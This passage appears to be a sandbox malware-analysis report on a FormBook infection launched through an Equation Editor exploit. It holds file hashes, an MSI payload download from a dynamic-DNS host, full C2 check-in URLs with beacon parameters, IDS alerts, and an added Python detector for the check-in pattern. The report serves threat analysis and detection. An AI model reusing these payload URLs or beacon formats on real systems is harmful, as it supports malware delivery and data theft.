3188 | WerFault.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_EQNEDT32.EXE_e4aa521f92615d8f32933274bec345ab359a4aca_cab_0c60f24e\Report.wer | binary
    MD5: EF4B25439F4075F63A4E88A33D00B724
    SHA256: E3499186F3615EF3797589518A0D206080CF64E04C3927E0A279FDD8A065D8B5
3188 | WerFault.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_EQNEDT32.EXE_e4aa521f92615d8f32933274bec345ab359a4aca_cab_0c60f24e\WERF126.tmp.WERInternalMetadata.xml | xml
    MD5: 6007F4DC7EE843C5D1123DEC32A04AEA
    SHA256: 501086D16016CF02AB9D9CD543E5B17413177C6350B090D68C3706BF830198D1

Hashes were not recorded for the entries marked "-". The WerFault heap and minidumps (WERF136.tmp.hdmp, WERF1D4.tmp.mdmp) belong to the AppCrash_EQNEDT32.EXE report, i.e. they capture the exploited Equation Editor process after it crashed (PIDs 2792 and 2804 under "Application was crashed"); pull them from the full report if you need to confirm the overflow rather than rely on the behavioural signature.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
29
TCP/UDP connections
34
DNS requests
23
Threats
72

HTTP requests

PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation
252 | explorer.exe | GET | - | 198.54.117.210:80 | http://www.udon-thani-directory.com/ha/?KtcDut2=gduUikMpfIdJA0K+t9sDgNZH29EIimTd+kz/tBt8FBKkvjIjEAEHf9dpC/JR7REA7RgVWg==&mz7xU=zZOP1n18Ez | US | - | - | malicious
252 | explorer.exe | POST | - | 198.54.117.210:80 | http://www.udon-thani-directory.com/ha/ | US | - | - | malicious
252 | explorer.exe | POST | - | 89.46.108.64:80 | http://www.foodstocktruck.com/ha/ | IT | - | - | malicious
252 | explorer.exe | POST | - | 198.54.117.210:80 | http://www.udon-thani-directory.com/ha/ | US | - | - | malicious
3552 | msiexec.exe | GET | 200 | 216.170.126.152:80 | http://joeing.duckdns.org/joe/onye.msi | US | executable | 396 Kb | malicious
252 | explorer.exe | GET | - | 184.168.221.52:80 | http://www.asantebeauty.com/ha/?KtcDut2=PF+28T9j506vqTI3xo0lj/6LId/3TfkZWS0BCNFgaCrap2njAKXPLVkMpXo73JkhPknEjA==&mz7xU=zZOP1n18Ez | US | - | - | malicious
3552 | msiexec.exe | GET | 200 | 216.170.126.152:80 | http://joeing.duckdns.org/joe/onye.msi | US | executable | 396 Kb | malicious
252 | explorer.exe | GET | 404 | 192.64.115.176:80 | http://www.skylod.com/ha/?KtcDut2=HSqaNnDc5SbFjjE4N24CnCxc2wWaP5zr+fN3XxC/DebGQe9AJdDbhQUfT2SIl/dq+3NihA==&mz7xU=zZOP1n18Ez | US | html | 326 b | malicious
252 | explorer.exe | POST | 404 | 192.64.115.176:80 | http://www.skylod.com/ha/ | US | html | 290 b | malicious
252 | explorer.exe | POST | - | 192.64.115.176:80 | http://www.skylod.com/ha/ | US | - | - | malicious
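The HTTP rows from explorer.exe show the FormBook check-in shape: the same short path (/ha/) requested on several unrelated domains, a GET whose query carries one parameter that stays constant across hosts (mz7xU=zZOP1n18Ez, the per-sample identifier) beside one that changes (the encrypted beacon), followed by POSTs to the same path, all originating from a process that is not a browser. FormBook rotates through a built-in list of domains of which most are decoys, which is why the same path shows up on Namecheap, GoDaddy and Aruba hosts in one run. The classifier below is an added example, not ANY.RUN's or PT Security's detection: it groups HTTP requests by process and path and scores each group on those properties, and separately flags an installer fetching a package from a dynamic-DNS host. The input rows are constructed from this report's HTTP table; the opera.exe row is a made-up benign control (the report lists the connection to crl4.digicert.com but no URL for it), and the dynamic-DNS suffix list is a partial one.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

BROWSERS = {"firefox.exe", "chrome.exe", "iexplore.exe", "opera.exe", "msedge.exe"}
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")  # partial list

# Constructed from the HTTP-request table in this report; the opera.exe row is a
# made-up benign control (the report shows no URL for crl4.digicert.com).
SAMPLE_REQUESTS = [
    (252, "explorer.exe", "GET", "http://www.udon-thani-directory.com/ha/?KtcDut2=gduUikMpfIdJA0K+t9sDgNZH29EIimTd+kz/tBt8FBKkvjIjEAEHf9dpC/JR7REA7RgVWg==&mz7xU=zZOP1n18Ez"),
    (252, "explorer.exe", "POST", "http://www.udon-thani-directory.com/ha/"),
    (252, "explorer.exe", "POST", "http://www.foodstocktruck.com/ha/"),
    (3552, "msiexec.exe", "GET", "http://joeing.duckdns.org/joe/onye.msi"),
    (252, "explorer.exe", "GET", "http://www.asantebeauty.com/ha/?KtcDut2=PF+28T9j506vqTI3xo0lj/6LId/3TfkZWS0BCNFgaCrap2njAKXPLVkMpXo73JkhPknEjA==&mz7xU=zZOP1n18Ez"),
    (252, "explorer.exe", "GET", "http://www.skylod.com/ha/?KtcDut2=HSqaNnDc5SbFjjE4N24CnCxc2wWaP5zr+fN3XxC/DebGQe9AJdDbhQUfT2SIl/dq+3NihA==&mz7xU=zZOP1n18Ez"),
    (252, "explorer.exe", "POST", "http://www.skylod.com/ha/"),
    (2968, "opera.exe", "GET", "http://crl4.digicert.com/DigiCertGlobalRootCA.crl"),
]


def analyse(requests, min_hosts=3):
    """Group requests by (pid, process, URL path) and score each group for the
    FormBook check-in shape: one short path on several unrelated hosts, GETs
    carrying a constant token beside a changing blob, POSTs to the same path,
    a non-browser originator; plus downloads from dynamic-DNS hosts."""
    groups = defaultdict(list)
    for pid, process, method, url in requests:
        parts = urlsplit(url)
        query = dict(parse_qsl(parts.query, keep_blank_values=True))
        groups[(pid, process.lower(), parts.path)].append((method.upper(), parts.hostname, query))

    findings = []
    for (pid, process, path), rows in groups.items():
        reasons = []
        hosts = {host for _, host, _ in rows}
        methods = {method for method, _, _ in rows}
        segments = [s for s in path.split("/") if s]

        # One short path name reused across unrelated domains: the rotating decoy list.
        if len(hosts) >= min_hosts and len(segments) == 1:
            reasons.append(f"path {path!r} requested on {len(hosts)} unrelated hosts")

        # GET check-in: a parameter constant across hosts next to one that changes.
        gets = [query for method, _, query in rows if method == "GET" and query]
        if len(gets) >= min_hosts:
            shared = set.intersection(*(set(q) for q in gets))
            constant = sorted(n for n in shared if len({q[n] for q in gets}) == 1)
            varying = sorted(n for n in shared if len({q[n] for q in gets}) == len(gets))
            if constant and varying:
                reasons.append(f"constant token {constant[0]}={gets[0][constant[0]]} "
                               f"beside varying {varying[0]} across hosts")

        if {"GET", "POST"} <= methods:
            reasons.append("GET check-in and POST upload to the same path")

        for host in hosts:
            if host and host.endswith(DYNAMIC_DNS_SUFFIXES):
                reasons.append(f"dynamic-DNS host {host}")

        # Non-browser origin is only a supporting signal, never a finding by itself.
        if reasons and process not in BROWSERS:
            reasons.append(f"originating process {process} is not a browser")

        if reasons:
            findings.append({"pid": pid, "process": process, "path": path,
                             "hosts": len(hosts), "reasons": reasons})
    return sorted(findings, key=lambda f: -len(f["reasons"]))


if __name__ == "__main__":
    for finding in analyse(SAMPLE_REQUESTS):
        print(finding["pid"], finding["process"], finding["path"], finding["reasons"])
```

The constant-versus-varying test is what separates a check-in from ordinary tracking pixels: analytics beacons also hit one path on many hosts, but their identifying parameter is per-site, not per-client. Run over a proxy log keyed by client rather than by PID, the same grouping works at the network boundary.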

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3552 | msiexec.exe | 216.170.126.152:80 | joeing.duckdns.org | ColoCrossing | US | malicious
252 | explorer.exe | 192.64.115.176:80 | www.skylod.com | Namecheap, Inc. | US | malicious
252 | explorer.exe | 184.168.221.52:80 | www.asantebeauty.com | GoDaddy.com, LLC | US | malicious
2968 | opera.exe | 185.26.182.93:443 | certs.opera.com | Opera Software AS | - | whitelisted
252 | explorer.exe | 213.186.33.5:80 | www.gallitrip.com | OVH SAS | FR | malicious
2968 | opera.exe | 93.184.220.29:80 | crl4.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
252 | explorer.exe | 89.46.108.64:80 | www.foodstocktruck.com | Aruba S.p.A. | IT | malicious
252 | explorer.exe | 198.54.117.210:80 | www.udon-thani-directory.com | Namecheap, Inc. | US | malicious
252 | explorer.exe | 64.98.145.30:80 | www.chrisminney.com | Tucows.com Co. | CA | malicious
252 | explorer.exe | 69.172.201.153:80 | www.actorlabs.com | Dosarrest Internet Security LTD | US | malicious

DNS requests

Domain
IP
Reputation
joeing.duckdns.org
  • 216.170.126.152
malicious
www.63qijian.com
unknown
www.asantebeauty.com
  • 184.168.221.52
malicious
www.skylod.com
  • 192.64.115.176
malicious
www.gallitrip.com
  • 213.186.33.5
malicious
www.andurilhuangblog.com
unknown
certs.opera.com
  • 185.26.182.93
  • 185.26.182.94
whitelisted
crl4.digicert.com
  • 93.184.220.29
whitelisted
www.foodstocktruck.com
  • 89.46.108.64
malicious
www.newhopefreshstart.com
unknown

Threats

PID | Process | Class | Message
1048 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3552 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3552 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download
3552 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3552 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3552 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download
3552 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET)
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET)
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
23 ETPRO signatures available at the full report
Process | Message
msiexec.exe | Failed to release Service
addinutil.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
addinutil.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 (this message is repeated 7 times)
addinutil.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302

HRESULT -2147024774 is 0x8007007A (ERROR_INSUFFICIENT_BUFFER). It comes from the VSTA add-in pipeline rebuild that the MSI triggered (addinutil.exe, PID 1340, parent MsiExec.exe, run as SYSTEM) and is installer side-noise rather than payload activity.